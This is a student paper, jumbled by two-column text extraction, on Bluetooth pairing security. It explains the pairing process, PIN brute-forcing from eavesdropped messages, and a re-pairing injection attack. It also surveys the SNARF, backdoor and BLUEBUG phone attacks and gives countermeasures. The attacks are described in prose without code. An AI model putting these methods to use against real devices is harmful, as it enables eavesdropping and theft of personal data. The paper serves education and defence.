bluetooth hacking by indevilscafe


									                       BLUETOOTH HACKING
PRERIT KAPADIA                                     ABHAS MANGAL

ID: 185                                            ID: 183                  

Project ID : CV-75                                 Project ID : CV-75

                ABSTRACT                           in the initial process itself. The encryption
                                                   algorithm followed during the pairing process
Want to immerse your handhelds, laptops or         is also discussed. Moreover dictionary of the
other electronic goodies in the world of           different types of attack and malicious tricks
Bluetooth, better rethink because are you then     they follow in order to gain control over
really secure? Want to learn more then             different services provided by the Bluetooth
proceed ahead. Here you would have a trip to       enabled devices is also dealt with in the paper.
various procedures in which many different         The various counter-measures needed to be
types of attacks would try their hands to          taken in order to prevent our beloved
capture the personal information of your           Bluetooth devices from being hacked are
Bluetooth enabled device. But would they           suggested. Paper also brings to center of
really hang out? Find out ahead .We cruise         attention the process of scanning of Bluetooth
through three important processes (the pairing     address thus enabling ethical hackers like us to
process) which any Bluetooth device must           come in contact with the alien Bluetooth
follow before transferring data using PIN and      devices.
also mentioned are the points to crack the PIN
                                                   - Close proximity not required as with infrared
                                                   data (IrDA) communication devices as
                                                   Bluetooth doesn't suffer from interference
What is Bluetooth?                                 from      obstacles     such      as     walls.
                                                   - Supports both point-to-point wireless
Bluetooth is a wireless technology that enables    connections without cables between mobile
any     electrical   device     to    wirelessly   phones and personal computers, as well as
communicate in the 2.5 GHz ISM (license            point-to-multipoint connections to enable ad
free) frequency band. It allows devices such as    hoc local wireless networks.
mobile phones, headsets, PDA's and portable
computers to communicate and send data to          - It uses unlicensed ISM (Industrial, Scientific
each other without the need for wires or cables    and Medical) band, 2400 - 2483.5 MHz,
to link to devices together. It has been           Modulation - Gaussian frequency shift keying,.
specifically designed as a low cost, low power,    Frequency Hopping Spread Spectrum - 1600
radio technology, which is particularly suited     hops/sec, amongst 79 channels, spaced at 1
to the short range Personal Area Network           MHz                                 separation.
(PAN) application. (It is the design focus on
low cost, low size and low power, which
distinguishes it from the IEEE 802.11 wireless
LAN technology).                                   When and How was it Conceived?
                                                   Bluetooth was originally conceived by
The     Main     Features     of   Bluetooth:      Ericsson in 1994, when they began a study to
- Operates in the 2.4GHz frequency band            examine alternatives to cables that linked
without a license for wireless communication.      mobile phone accessories.
- Real-time data transfer usually possible
between                             10-100m.
Where did the Name Come From?                          This algorithm outputs a 128-bit word, which
Bluetooth was named after Herald Blatand (or           is referred to as the initialization key (Kinit).
Bluetooth), a tenth century Danish Viking king
who had united and controlled large parts of           Figure 1 describes how Kinit is generated using
Scandinavia which are today Denmark and                E22. Note that the PIN code is available at both
Norway. The name was chosen to highlight               Bluetooth devices, and the 128 bit IN_RAND is
the potential of the technology to unify the           transmitted in plaintext. As for the BD_ADDR:
telecommunications and computing industries            if one of the devices has a fixed PIN, they use
                                                       the BD_ADDR of the peer device. If both have
SIG                           Membership?              a variable PIN, they use the PIN of the slave
Since its original foundation, the Bluetooth           device that receives the IN_RAND. In Figure 1,
SIG has transitioned into a not-for-profit trade       if both devices have a variable PIN,
association, Bluetooth SIG, Inc. Membership            BD_ADDRB shall be used. The Bluetooth
is open to all companies wishing to develop,           device address can be obtained via an inquiry
market and promote Bluetooth products at two           routine by a device. This is usually done before
levels - Associate and Adopter Members.                connection establishment begins

                                                       This initialization key (Kinit) is used only
Bluetooth Security                                     during the pairing process. Upon the creation
                                                       of the link key (Kab), the Kinit key is discarded.
1    The     Bluetooth          pairing       &
authentication process

The Bluetooth initialization procedures consist
of 3 or 4 steps:

    1.   Creation of an initialization key
    2.   Creation of a link key (Kab).
    3.   Authentication.

After the 3 pairing steps are completed, the
devices can derive an encryption key to hide
all future communication in an optional fourth

Before the pairing process can begin, the PIN
code must be entered into both Bluetooth
devices. Note that in some devices (like
wireless earphones) the PIN is fixed and            Figure 1: Generation of Kinit using E22
cannot be changed. In such cases, the fixed
PIN is entered into the peer device. If two
devices have a fixed PIN, they cannot be
paired, and therefore cannot communicate. In
                                                       2.1.2 Creation of Kab
the following sections we go into the details of       After creating the initialization key, the
the steps of the pairing process.                      devices create the link key Kab. The devices use
                                                       the initialization key to exchange two new 128
                                                       bit random words, known as LK_RANDA and
                                                       LK_RANDB. Each device selects a random 128
1 Creation of Kinit                                    bit word and sends it to the other device after
The Kinit key is created using the E22 algorithm,      bitwise xoring it with Kinit. Since both devices
whose inputs are:                                      know Kinit, each device now holds both random
                                                       numbers LK_RANDA and LK_RANDB. Using
    1.   a BD_ADDR.                                    the E21 algorithm, both devices create the link
    2.   the PIN code and its length.                  key Kab. The inputs of E21 algorithm are:
    3.   a 128 bit random number IN_RAND.
                                                           1.   a BD_ADDR.
     2.   The 128       bit   random     number

 Note that E21 is used twice is each device, with
 two sets of inputs. Figure 2 describes how the
 link key Kab is created.

                                                    Figure 3: Mutual authentication process
                                                    using E1

                                                     2.2     Bluetooth             cryptographic
                                                     As we described above, the Bluetooth pairing
Figure 2: Generation of Kab using E21                and authentication process uses three
                                                     algorithms: E22, E21, E1. All of these algorithms
                                                     are based on the SAFER+ cipher with some
 2.1.3 Mutual authentication                         modifications. Here we describe features of
                                                     SAFER+ that are relevant to our attack.
 Upon creation of the link key Kab, mutual
 authentication is performed. This process is
 based on a challenge-response scheme. One of
 the devices, the verifier, randomizes and sends
                                                     2.2.1 Description of SAFER+
 (in plaintext) a 128 bit word called                SAFER+ is a block cipher with a block size of
 AU_RANDA. The other device, the claimant,           128 bits and three different key lengths: 128,
 calculates a 32 bit word called SRES using an       192 and 256 bits. Bluetooth uses SAFER+
 algorithm E1. The claimant sends the 32 bit         with 128 bit key length. In this mode, SAFER+
 SRES word as a reply to the verifier, who           consists of:
 verifies (by performing the same calculations)
 the response word. If the response word is              1.   KSA - A key scheduling algorithm
 successful, the verifier and the claimant change             that produces 17 different 128-bit
 roles and repeat the entire process. Figure 3                subkeys.
 describes the process of mutual authentication.         2.   8 identical rounds.
 The inputs to E1 are:                                   3.   An output transformation - which is
                                                              implemented as a xor between the
     1.   The random word AU_RANDA.                           output of the last round and the last
     2.   The link key Kab.                                   subkey.
     3.   Its own Bluetooth device address
          (BD_ADDRB).                                Figure 4 describes the inner design           of
                                                     SAFER+, as it is used in Bluetooth.
 Note that as a side effect of the authentication
 process, both peers calculate a 96 bit word
 called ACO. This word is optionally used
 during the creation of the encryption key. The
 creation of this encryption key exceeds our
 primary discussion and shall not be described
 in this paper.
                                                     Table 1: List of messages sent during
                                                     the pairing and authentication process.
                                                     ``A'' and ``B'' denote the two Bluetooth
                                                      # Src Dst Data              Length Notes
                                                      1 A     B     IN_RAND       128 bit plaintext
                                                      2 A     B     LK_RANDA 128 bit with
                                                      3 B     A     LK_RANDB 128 bit with
                                                      4 A     B     AU_RANDA 128 bit plaintext
                                                      5 B     A     SRES          32 bit    plaintext
                                                      6 B     A     AU_RANDB 128 bit plaintext
                                                      7 A     B     SRES          32 bit    plaintext

                                                     Assume that the attacker eavesdropped on an
                                                     entire pairing and authentication process, and
Figure 4: Inner design of SAFER+                     saved all the messages (see Table 1). The
                                                     attacker can now use a brute force algorithm to
The key scheduling algorithm (KSA)                   find the PIN used. The attacker enumerates all
                                                     possible values of the PIN. Knowing
The key scheduling algorithm used in                 IN_RAND and the BD_ADDR, the attacker
SAFER+ produces 17 different 128-bit                 runs E22 with those inputs and the guessed
subkeys, denoted K1 to K17. Each SAFER+              PIN, and finds a hypothesis for Kinit. The
round uses 2 subkeys, and the last key is used       attacker can now use this hypothesis of the
in the SAFER+ output transformation. The             initialization key, to decode messages 2 and 3.
important details for our discussion are that in     Messages 2 and 3 contain enough information
each step of the KSA, each byte is cyclic-           to perform the calculation of the link key Kab,
rotated left by 3 bit positions, and 16 bytes (out   giving the attacker a hypothesis of Kab. The
of 17) are selected for the output subkey. In        attacker now uses the data in the last 4
addition, a 128 bit bias vector, different in each   messages to test the hypothesis: Using Kab and
step, is added to the selected output bytes.         the transmitted AU_RANDA (message 4), the
                                                     attacker calculates SRES and compares it to the
                                                     data of message 5. If necessary, the attacker
The SAFER+ Round                                     can use the value of messages 6 and 7 to re-
                                                     verify the hypothesis Kab until the correct PIN
As depicted, SAFER+ consists of 8 identical          is found. Figure 6 describes the entire process
rounds. Each round calculates a 128 bit word         of PIN cracking.
out of two subkeys and a 128 bit input word
from the previous round.                             Note that the attack, as described, is only fully
                                                     successful against PIN values of under 64 bits.
3 Bluetooth PIN Cracking                             If the PIN is longer, then with high probability
                                                     there will be multiple PIN candidates, since the
                                                     two SRES values only provide 64 bits of data
3.1 The Basic Attack:                                to test against. A 64 bit PIN is equivalent to a
                                                     19 decimal digits PIN.
                                                  the messages and crack the PIN using the
                                                  primary attack described in this paper.

                                                  4.2 Attack details

                                                  Assume that two Bluetooth devices that have
                                                  already been paired before now intend to
                                                  establish communication again. This means
                                                  that they don't need to create the link key Kab
                                                  again, since they have already created and
                                                  stored it before. They proceed directly to the
                                                  Authentication phase (Recall Figure 3). We
                                                  describe three different methods that can be
                                                  used to force the devices to repeat the pairing
                                                  process. The efficiency of each method
                                                  depends on the implementation of the
                                                  Bluetooth core in the device under attack.
                                                  These methods appear in order of efficiency:

                                                      1.   Since the devices skipped the pairing
                                                           process and proceeded directly to the
                                                           Authentication phase, the master
                                                           device sends the slave an AU_RAND
                                                           message, and expects the SRES
                                                           message in return. Note that
                                                           Bluetooth specifications allow a
                                                           Bluetooth device to forget a link key.
                                                           In such a case, the slave sends an
                                                           LMP_not_accepted         message     in
                                                           return, to let the master know it has
                                                           forgotten the link key. Therefore,
                                                           after the master device has sent the
                                                           AU_RAND message to the slave, the
 Figure 6: The Basic Attack Structure.
                                                           attacker injects a LMP_not_accepted
                                                           message toward the master. The
                                                           master will be convinced that the
4 The Re-Pairing attack                                    slave has lost the link key and pairing
                                                           will be restarted. Restarting the
4.1 Background and motivation                              pairing procedure causes the master to
This section describes an additional attack on             discard the link key. This assures
Bluetooth devices that is useful when used in              pairing must be done before devices
conjunction with the primary attack described              can authenticate again.
in Section 3. Recall that the primary attack is       2.   At       the   beginning      of    the
only applicable if the attacker has                        Authentication phase, the master
eavesdropped on the entire process of pairing              device is supposed to send the
and authentication. This is a major limitation             AU_RAND to the slave. If before
since the pairing process is rarely repeated.              doing so, the attacker injects a
Once the link key Kab is created, each                     IN_RAND message toward the slave,
Bluetooth device stores it for possible future             the slave device will be convinced the
communication with the peer device. If at a                master has lost the link key and
later point in time the device initiates                   pairing is restarted. This will cause
communication with the same peer - the stored              the connection establishment to
link key is used and the pairing process is                restart.
skipped. Our second attack exploits the               3.   During the Authentication phase, the
connection establishment protocol to force the             master device sends the slave an
communicating devices to repeat the pairing                AU_RAND message, and expects a
process. This allows the attacker to record all            SRES message in return. If, after the
                                                           master has sent the AU_RAND
         message, an attacker injects a random     5 Countermeasures
         SRES message toward the master, this      This section details the countermeasures one
         will cause the Authentication phase to    should consider when using a Bluetooth
         restart, and repeated attempts will be    device. These countermeasures will reduce the
         made. At some point, after a certain      probability of being subjected to both attacks
         number of failed authentication           and the vulnerability to these attacks.
         attempts, the master device is
         expected to declare that the              1. Since Bluetooth is a wireless technology, it
         authentication procedure has failed       is very difficult to avoid Bluetooth signals
         (implementation dependent) and            from leaking outside the desired boundaries.
         initiate pairing.                         Therefore,     one    should      follow   the
    4.   The three methods described above         recommendation in the Bluetooth standard and
         cause one of the devices to discard its   refrain from entering the PIN into the
         link key. This assures the pairing        Bluetooth device for pairing as much as
         process will occur during the next        possible. This reduces the risk of an attacker
         connection establishment, so the          eavesdropping on the pairing process and
         attacker will be able to eavesdrop on     finding the PIN used.
         the entire process, and use the method
         described in Section 3 to crack the
                                                   Most Bluetooth devices save the link key (Kab)
                                                   in non-volatile memory for future use. This
                                                   way, when the same Bluetooth devices wish to
In order to make the attack ``online'', the        communicate again, they use the stored link
attacker can save all the messages transferred     key. However, there is another mode of work,
between the devices after the pairing is           which requires entering the PIN into both
complete. After breaking the PIN (0.06-0.3 sec     devices every time they wish to communicate,
for a 4 digit PIN), the attacker can decode the    even if they have already been paired before.
saved messages, and continue to eavesdrop and      This mode gives a false sense of security!
decode the communication on the fly. Since         Starting the pairing process every time
Bluetooth supports a bit rate of 1 Megabit per     increases the probability of an attacker
second, a 40KB buffer is more than enough for      eavesdropping on the messages transferred.
the common case of a 4 digit PIN.                  We suggest not to use this mode of work.

Notes:                                             2. Finally, the PIN length ranges from 8 to 128
                                                   bits. Most manufacturers use a 4 digit PIN and
    1.   The Bluetooth specification does          supply it with the device. Obviously,
         allow devices to forget link keys and     customers should demand the ability to use
         to require repeating the pairing          longer PINs.
         process. This fact makes the re-
         pairing attack applicable.                3.Instead of passing messages in plain text,
    2.   Re-Pairing is an active attack, that      they should be encoded before transmission.
         requires the attacker to inject a
         specific message at a precise point in
         the protocol. This is most likely needs   The Future of Bluetooth
         a custom Bluetooth device since off-
         the-shelf components will be unable
                                                   The next version of Bluetooth, currently code
         to support such behavior.
                                                   named Lisbon, includes a number of features
    3.   If the slave device verifies that the
                                                   to increase security, usability and value of
         message it receives is from the correct
                                                   Bluetooth. The following features are defined:
         BD_ADDR, then the attack requires
         the injected message to have its
         source BD_ADDR ``spoofed'' - again            -    Atomic Encryption Change
         requiring custom hardware.                    -    Extended Inquiry Response
    4.   If the attack is successful, the              -    Sniff Subrating QoS Improvements
         Bluetooth user will need to enter the         -    Simple Pairing
         PIN again - so a suspicious user may
         realize that his Bluetooth device is      Types of attacks in Bluetooth
         under attack and refuse to enter the
The                SNARF                  attack:      expensive destinations, or for identity theft by
It is possible, on some makes of device, to            impersonation of the victim.
connect to the device without alerting the
owner of the target device of the request, and         Scanning for Bluetooth addresses
gain access to restricted portions of the stored
data therein, including the entire phonebook           The Bluetooth address itself is a unique 48bit
(and any images or other data associated with          device identifier, where the first 3 bytes of the
the entries), calendar, realtime clock, business       address are assigned to a specific manufacturer
card,     properties,    change     log,    IMEI       by the IEEE (, and the last 3
(International Mobile Equipment Identity [6],          bytes are freely allocated by the manufacturer.
which uniquely identifies the phone to the             For example, the hexadecimal representation
mobile network, and is used in illegal phone           of a Sony Ericsson P900 phone's Bluetooth
'cloning'). This is normally only possible if the      address may look like 00:0A:D9:EB:66:C7,
device is in "discoverable" or "visible" mode,         where the first 3 bytes of this address
but there are tools available on the Internet that     (00:0A:D9) are registered to Sony Ericsson by
allow even this safety net to be bypassed.             the IEEE, meaning that all P900 phones will
                                                       have their Bluetooth address starting with
                                                       same 3 bytes. The last 3 bytes (EB:66:C7) of
The            BACKDOOR                   attack:      the sample address are assigned to this device
The backdoor attack involves establishing a            by Sony Ericsson and should be different for
trust relationship through the "pairing"               each P900 phone -- but is not always,
mechanism, but ensuring that it no longer              unfortunately.
appears in the target's register of paired
devices. In this way, unless the owner is
                                                       In theory, enabling the non-discoverable mode
actually observing their device at the precise
                                                       on a Bluetooth device should protect users
moment a connection is established. Device
                                                       from unauthorized connections, yet in practice
grants access to services. This means that not
                                                       it is still quite possible to find these devices.
only can data be retrieved from the phone, but
                                                       There are software tools available which allow
other services, such as modems or Internet,
                                                       brute-force discovery of non-discoverable
WAP and GPRS gateways may be accessed
                                                       devices. An example of such an application is
without the owner's knowledge or consent.
                                                       RedFang by Ollie Whitehouse, a small
Indications are that once the backdoor is
                                                       application which simply tries to connect to a
installed, the above SNARF attack will
                                                       unique Bluetooth address one by one, until
function on devices that previously denied
                                                       finally a hidden device answers the request
access, and without the restrictions of a plain
                                                       sent that was sent to that particular address.
SNARF attack, so we strongly suspect that the
                                                       Author's initial test is a minimum of 6 seconds
other services will prove to be available also.
                                                       to achieve a good level of accuracy (it varies
                                                       from 2.5 to 10 seconds, on average). It is
The             BLUEBUG                   attack:      certainly possible to find a hidden device in
The bluebug attack creates a serial profile            less than 3 seconds, The address space used by
connection to the device, thereby giving full          Sony Ericsson has 16,777,216 possible
access to the AT command set, which can then           addresses. If we assume 6 seconds are required
be exploited using standard off the shelf tools,       per device, the total scan would take us 1165
such as PPP for networking and gnokii for              days, meaning we would need more than 3
messaging, contact management, diverts and             years to discover all hidden Sony Ericsson
initiating calls. With this facility, it is possible   phones in a conference room.
to use the phone to initiate calls to premium
rate numbers, send sms messages, read sms
messages, connect to data services such as the
Internet, and even monitor conversations in the        With the advancement of digital convergence
vicinity of the phone. This latter is done via a       on M-commerce, usuage of bluetooth in
voice call over the GSM network, so the                connecting different devices is going to be
listening post can be anywhere in the world.           significant. But to make communication more
Bluetooth access is only required for a few            secure advancement in the prospect of security
seconds in order to set up the call. Call              must not be neglected.
forwarding diverts can be set up, allowing the
owner's incoming calls to be intercepted, either       Reference:
to provide a channel for calls to more       

To top